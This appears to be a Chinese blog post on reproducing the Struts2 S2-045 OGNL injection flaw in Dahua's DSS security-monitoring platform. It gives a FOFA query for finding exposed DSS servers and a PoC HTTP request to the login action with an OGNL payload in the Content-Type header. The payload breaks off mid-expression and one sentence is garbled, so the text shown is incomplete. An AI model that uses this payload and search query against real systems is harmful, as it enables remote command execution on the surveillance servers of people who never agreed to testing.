本文主要是介绍大华DSS S2-045 OGNL表达式注入漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 产品简介
大华DSS安防监控系统平台是一款集视频、报警、存储、管理于一体的综合安防解决方案。该平台支持多种接入方式,包括网络视频、模拟视频、数字视频、IP电话、对讲机等。此外,该平台还支持多种报警方式,包括移动侦测、区域入侵、越线报警、人员聚集等。
0x02 漏洞概述
大华DSS安防监控系统平台采用ApacheStruts2作为网站应用框架。由于应用程序框架存在远程命令执行漏洞,攻击者可以通过在上传文件时修改HTTP请求标头中的Content Type值来触发该漏洞,然后执行该漏洞。系统命令以获取服务器权限。
0x03 复现环境
FOFA:
body="/portal/include/script/dahuaDefined/headCommon.js?type=index" && title="DSS"
0x04 漏洞复现
PoC
POST /admin/login_login.action HTTP/1.1
Host: your-ip
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container
这篇关于大华DSS S2-045 OGNL表达式注入漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!